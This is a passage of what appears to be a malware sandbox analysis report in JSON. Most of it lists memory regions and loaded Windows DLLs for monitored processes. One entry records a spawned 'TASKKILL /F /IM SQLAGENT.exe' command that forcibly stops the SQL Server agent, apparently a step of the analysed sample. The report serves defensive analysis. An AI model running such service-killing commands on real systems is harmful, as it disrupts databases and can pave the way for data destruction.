"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4006", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:31.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_4007", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:01:31.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32571391, "entry_point": 0, "filename": null, "id": "region_4008", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:31.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4009", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:31.365", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM SQLAGENT.exe /IM SQLAGENT.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_33", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 33, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4010", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:31.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4011", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:31.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4012", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:31.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4013", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4014", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_4015", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_4016", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5922815, "entry_point": 5856393, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4017", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 5832704, "timestamp": "00:01:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4018", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:31.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4019", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:31.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4020", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4021", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4022", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4023", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4024", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4025", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4026", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_4027", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:01:31.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4028", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:31.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4029", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:31.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4030", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:31.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4031", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:31.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4032", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:31.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4033", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:31.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4034", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:31.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4035", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:31.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1048575, "entry_point": 0, "filename": null, "id": "region_4036", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:31.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 8585215, "entry_point": 0, "filename": null, "id": "region_4037", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:01:31.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4038", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:31.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787490303, "entry_point": 1787433633, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4039", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:31.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787494400, "type": "region", "version": 1 }, "end_va": 1787564031, "entry_point": 1787499264, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4040", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787494400, "timestamp": "00:01:31.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1787625472, "type": "region", "version": 1 }, "end_va": 1787678719, "entry_point": 1787630048, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4041", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787625472, "timestamp": "00:01:31.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787908095, "entry_point": 1787696085, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4042", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:31.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4043", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:31.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4044", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:31.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4045", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:31.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4046", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:31.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4047", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:31.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4048", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:31.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4049", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:31.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4050", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:31.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4051", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:31.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4052", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:31.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4053", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:31.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4054", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:31.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4055", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:31.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4056", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:31.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4057", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:31.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4058", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:31.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4059", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:31.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4060", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:31.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4061", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:31.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4062", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:31.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4063", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:31.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4064", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:31.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed 